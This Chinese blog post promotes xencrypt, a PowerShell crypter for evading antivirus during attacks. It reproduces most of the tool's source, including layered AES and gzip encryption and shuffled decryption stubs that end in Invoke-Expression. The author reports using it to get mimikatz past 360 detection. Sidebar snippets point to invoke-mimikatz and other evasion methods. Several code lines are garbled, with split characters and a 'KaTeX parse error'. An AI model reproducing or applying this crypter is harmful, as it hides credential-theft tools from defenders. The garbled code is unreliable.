xencrypt工具原理分析及使用

已于 2024-01-06 21:34:52 修改
阅读量97 收藏
点赞数
文章标签: 数学建模 matlab 开发语言 系统安全 计算机网络
于 2023-06-01 11:34:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jennycisp/article/details/130984798
版权

我们在攻击过程中,经常会遇到有杀软拦截的情况,对于绕过的方式也不尽相同:有基于黑白名单的,有基于shellloader的,也有基于加密与混淆的。今天介绍一款工具-xencrypt是基于powershell编写的,原理是基于加密与混淆的工具,大家知道现在加密和混淆被杀软检测的狠,其实生存空间越来越难,这个工具主要觉得原来就用过,觉得效果还行,同时工具整体不复杂,可以基于需求自己修改来用。
网络安全学习教程及工具包 点击免费领取
工具的整体流程为
在这里插入图片描述

源码也是简洁明了,算上注释才200行,不算注释在150行左右:
1.读取文件
# read
Write-Output “[*] Reading ‘ ( ( (infile)’ …”
c o d e b y t e s = [ S y s t e m . I O . F i l e ] : : R e a d A l l B y t e s ( codebytes = [System.IO.File]::ReadAllBytes( codebytes=[System.IO.File]::ReadAllBytes(infile)

    for ($i = 1; $i -le $iterations; $i++) {
        # Decide on encryption params ahead of time 
        
        Write-Output "[*] Starting code layer  ..."
        $paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
        $paddingmode = $paddingmodes | Get-Random
        $ciphermodes = 'ECB','CBC'
        $ciphermode = $ciphermodes | Get-Random

        $keysizes = 128,192,256
        $keysize = $keysizes | Get-Random

        $compressiontypes = 'Gzip','Deflate'
        $compressiontype = $compressiontypes | Get-Random

        # compress
        Write-Output "[*] Compressing ..."
        [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
        if ($compressiontype -eq "Gzip") {
            $compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
        } elseif ( $compressiontype -eq "Deflate") {
            $compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
        }
              $compressionStream.Write( $codebytes, 0, $codebytes.Length )
        $compressionStream.Close()
        $output.Close()
        $compressedBytes = $output.ToArray()

2.压缩

       Write-Output "[*] Compressing ..."
        [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
        if ($compressiontype -eq "Gzip") {
            $compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
        } elseif ( $compressiontype -eq "Deflate") {
            $compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
        }
              $compressionStream.Write( $codebytes, 0, $codebytes.Length )
        $compressionStream.Close()
        $output.Close()
        $compressedBytes = $output.ToArray()

3.生成秘钥
# generate key
Write-Output “[*] Generating encryption key …”
a e s M a n a g e d = N e w − O b j e c t " S y s t e m . S e c u r i t y . C r y p t o g r a p h y . A e s M a n a g e d " i f ( aesManaged = New-Object "System.Security.Cryptography.AesManaged" if ( aesManaged=NewObject"System.Security.Cryptography.AesManaged"if(ciphermode -eq ‘CBC’) {
KaTeX parse error: Expected 'EOF', got '}' at position 78: …BC }̲ elseif (ciphermode -eq ‘ECB’) {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
}

        if ($paddingmode -eq 'PKCS7') {
            $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        } elseif ($paddingmode -eq 'ISO10126') {
            $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
        } elseif ($paddingmode -eq 'ANSIX923') {
            $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
        } elseif ($paddingmode -eq 'Zeros') {
            $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
        }

        $aesManaged.BlockSize = 128
        $aesManaged.KeySize = 256
        $aesManaged.GenerateKey()
        $b64key = [System.Convert]::ToBase64String($aesManaged.Key)

4.加密

        Write-Output "[*] Encrypting ..."
        $encryptor = $aesManaged.CreateEncryptor()
        $encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
        [byte[]] $fullData = $aesManaged.IV + $encryptedData
        $aesManaged.Dispose()
        $b64encrypted = [System.Convert]::ToBase64String($fullData)

5.写操作

       Write-Output "[*] Finalizing code layer ..."

        # now, randomize the order of any statements that we can to further increase variation

        $stub_template = ''

        $code_alternatives  = @()
        $code_alternatives += '${2} = [System.Convert]::FromBase64String("{0}")' + "`r`n"
        $code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
        $code_alternatives += '${4} = New-Object "System.Security.Cryptography.AesManaged"' + "`r`n"
        $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
        $stub_template += $code_alternatives_shuffled -join ''

        $code_alternatives  = @()
        $code_alternatives += '${4}.Mode = [System.Security.Cryptography.CipherMode]::'+$ciphermode + "`r`n"
        $code_alternatives += '${4}.Padding = [System.Security.Cryptography.PaddingMode]::'+$paddingmode + "`r`n"
        $code_alternatives += '${4}.BlockSize = 128' + "`r`n"
        $code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
        $code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
        $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
        $stub_template += $code_alternatives_shuffled -join ''

        $code_alternatives  = @()
        $code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
        $code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
        $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
        $stub_template += $code_alternatives_shuffled -join ''


        if ($compressiontype -eq "Gzip") {
            $stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)'    + "`r`n"
        } elseif ( $compressiontype -eq "Deflate") {
            $stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
        }
        $stub_template += '${5}.CopyTo(${7})' + "`r`n"

        $code_alternatives  = @()
        $code_alternatives += '${5}.Close()' + "`r`n"
        $code_alternatives += '${4}.Dispose()' + "`r`n"
        $code_alternatives += '${6}.Close()' + "`r`n"
        $code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
        $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
        $stub_template += $code_alternatives_shuffled -join ''

        $stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"
        
    
        # it's ugly, but it beats concatenating each value manually.
        $code = $stub_template -f $b64encrypted, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var)
        $codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
    }
    Write-Output "[*] Writing '$($outfile)' ..."
    [System.IO.File]::WriteAllText($outfile,$code)
    Write-Output "[+] Done!"

整个流程非常的简洁明了,不满足现有需求的,也可以自己修改源码。
使用minikataz测试一下效果,未经工具处理的检测结果
在这里插入图片描述
使用默认参数的效果
在这里插入图片描述
在这里插入图片描述
经过5次工具处理的结果
在这里插入图片描述
在这里插入图片描述

觉得效果还可以,毕竟国内常用的360这些还是过了的。项目地址:https://github.com/the-xentropy/xencrypt 有更高需要的,可以自己再改改源码

朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,点击下方链接即可前往免费获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》

这份完整版的学习资料已经上传CSDN,也可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费

在这里插入图片描述

网络安全技术库
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
通过xencrypt免杀invoke-mimikatz.ps1
网络安全。
03-03 1581
0x01 简介 xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。 0x02 使用 1、下载invoke-mimikatz.ps1到同级目录下。 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
Xencrypt:反病毒绕过工具
weixin_43977912的博客
04-26 367
今天给大家介绍的这款工具名叫Xencrypt,它是一款基于PowerShell脚本实现的反病毒绕过工具。如果你不想花时间对类似invoke-mimikatz这样的PowerShell脚本进行混淆处理以避免其被检测到的话,那么Xencrypt就是你的最佳选择了。Xencrypt能够自动对目标脚本代码进行处理,并且可以生成近乎无限量的变种代码,以帮助研究人员绕过基于签名机制的反病毒检测产品。 从本质上来说,Xencrypt是一款PowerShell代码加密工具,它使用了AES加密算法以及Gzip/DEFLATE
推荐开源项目:Xencrypt - 强大的PowerShell加密工具
gitblog_00050的博客
05-15 260
推荐开源项目:Xencrypt - 强大的PowerShell加密工具 项目地址:https://gitcode.com/the-xentropy/xencrypt 项目介绍 Xencrypt是一个基于PowerShell的高级加密器,由Xentropy和SecForce共同开发,旨在保护你的脚本免受现代防病毒软件(如AMSI)的检测。这个工具不仅能够压缩并加密PowerShell脚本,还提供了一...
powershell免杀学习:过360、火绒
Keepb1ue的博客
11-24 8954
首先先通过msfvenon生成一个ps1脚本 使用到的脚本项目地址: https://github.com/peewpw/Invoke-PSImage 自己准备一张jpg图片 powershell默认是不允许加载外部脚本文件的,所以在打开powershell时需要用executionpolicy bypass参数来绕过策略的限制;然后import-module来导入invoke-psimage.ps1脚本; 利用工具通过powershell将生成的ps1脚本与test.jpg合成为shell.png
PowerShell脚本免杀/bypass/绕过杀毒软件
wdsj_xh的博客
05-12 2288
项目地址:https://github.com/the-xentropy/xencrypt 原文链接:http://caidaome.com/?post=246 Xencrypt是一个PowerShell加密程序,以达到某些场景下免杀/bypass/绕过杀毒软件的效果。厌倦了浪费大量时间混淆诸如invoke-mimikatz之类的PowerShell脚本,以至于无论如何都无法检测到它们?如果您可以采用任何脚本并自动且几乎不费力地生成几乎无限数量的变体来击败基于签名的防病毒检测机制,那岂不是很棒吗?.
encrypt 加密解密
热门推荐
稻香的专栏
10-20 1万+
import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import org.junit.Test; public class Testencrypt { @Test public void testCrossLa
2020.06-Mimikatz的18种免杀姿势及防御策略1
08-03
标题 "2020.06-Mimikatz的18种免杀姿势及防御策略1" 描述的是关于网络安全领域中的一个著名工具——Mimikatz,以及如何避免被安全防护软件检测到(免杀)的多种方法。Mimikatz是由Benjamin Delpy开发的一个开源工具...
xxtea_java.rar_XXTEA_XXTEA java_java XXTEA_java加解密
09-14
XXTEA(Extreme eXtended TEA...以上就是关于XXTEA Java实现的一些基本知识点,包括算法原理、Java实现的步骤、可能的代码结构以及使用时的注意事项。理解这些内容可以帮助开发者在Java项目中有效地应用XXTEA加密算法。
Encrypt加密
hffjc的博客
08-19 9031
通过编码对文件或电子邮件进行加密,经过加密的文件或电子邮件是无法阅读的乱码,只有知道密钥(Key)的人才能将其解密阅读,从而保证文件或电子邮件传送的安全。 也有对发送的代码,图片进行加密等,都是为了保证索要发送数据的安全。
第一次参加数学建模竞赛新手小白备赛经验贴
m0_37228052的博客
07-11 1222
2024年暑假已经来临,下半年的非常多,许多同学可能是第一次参赛,对于如何准备感到迷茫和无从下手。在这种情况下,我们将分享一些备赛的小技巧,帮助大家在这个暑假更好的入门,即便是零基础的小白也能在数学建模中得心应手。
新时代多目标优化【数学建模】领域的极致探索——数学规划模型
小李很执着的博客
07-15 2857
数学规划模型是数学建模中用于描述和解决优化问题的一类模型。它通过构建目标函数和约束条件,将实际问题转化为数学形式,旨在寻找满足约束条件的最优解。数学规划模型广泛应用于各个领域,包括资源分配、生产计划、物流管理和金融投资等,通过线性规划、非线性规划、整数规划等方法,帮助决策者在复杂环境中做出最优选择。
数学建模--优劣解距离法TOPSIS
2302_80644606的博客
07-20 743
优劣解距离法(Technique for Order Preference by Similarity to an Ideal Solution,简称TOPSIS)是一种常用的综合评价方法,由C.L.Hwang和K.Yoon在1981年首次提出。该方法通过检测评价对象与最优解、最劣解的距离来进行排序,把距离作为评价标准。
集成学习在数学建模中的应用
wanchen_Gabby的博客
07-20 426
包含:集成学习的概述、Bagging方法(特点、参数设置等)、Boost方法、AdaBoost算法(弱分类器的权重、样本集的权重、弱分类器的组合、实例、特点、参数设置等)、Bagging和Boost的区别、模型的组合
数学建模--灰色关联分析
最新发布
2302_80644606的博客
07-21 761
灰色关联分析法(Grey Relation Analysis,GRA)是一种用于研究数据之间关联性的方法,广泛应用于系统分析、预测和决策等领域。其基本思想是通过比较参考序列(母序列)与特征序列(子序列)的几何形状相似程度来判断它们之间的关联程度。
数学建模】技术革新——Lingo的使用超详解
小李很执着的博客
07-16 1465
Lingo是一款功能强大的数学建模和优化求解工具,广泛用于线性规划、整数规划和非线性规划等领域。其基本语法包括变量声明、常量声明、目标函数定义和约束条件设置。通过@VARIABLES和@CONSTANTS关键字声明变量和常量,使用MAX或MIN定义目标函数,并通过线性或非线性表达式设置约束条件。Lingo支持二进制变量和整数变量声明,通过@BIN和@GIN关键字实现。注释可以用!添加,以提高代码可读性。掌握这些基础知识,可以帮助用户构建并求解复杂的优化模型。
数学建模】多波束测线问题(持续更新)
weixin_72899100的博客
07-16 801
数学建模】多波束测线问题(持续更新)
数学建模-----SPSS参数检验和非参数检验
binhyun的博客
07-20 728
参数检验 和 非参数检验
数学建模——快递包裹装箱优化问题(2023年长三角数学建模A题问题一、问题二)
m0_75097013的博客
07-19 863
2022年快递行业的发展迅速,变革之年,成长可期,快递行业的迅速发展,也带来了一些关于这方面的问题,在包装快递时,如何做到让快递的打包环节能够做到减少耗材的浪费,是一个重要的问题,快递基数大,即使是对快递包装减少极小量,也能够带来巨大的经济效益,并且对于环保也有所助益,本文即是在研究快递在进行包装时如何能够取得最优方案。
运筹学:决策优化的艺术
零度°C的博客
07-19 785
运筹学不仅仅是一门科学,更是一种艺术。它通过严谨的数学方法,帮助我们在复杂的现实世界中做出最优的决策。随着大数据和人工智能技术的发展,运筹学的应用将更加广泛和深入。未来,运筹学将继续在各个领域发挥其独特的价值,助力人类社会的发展和进步。如果你对运筹学感兴趣,不妨深入学习相关的数学和统计学知识,掌握运筹学的工具和方法。这不仅能够提升你的决策能力,还能为你的职业生涯增添更多的可能性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全技术库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值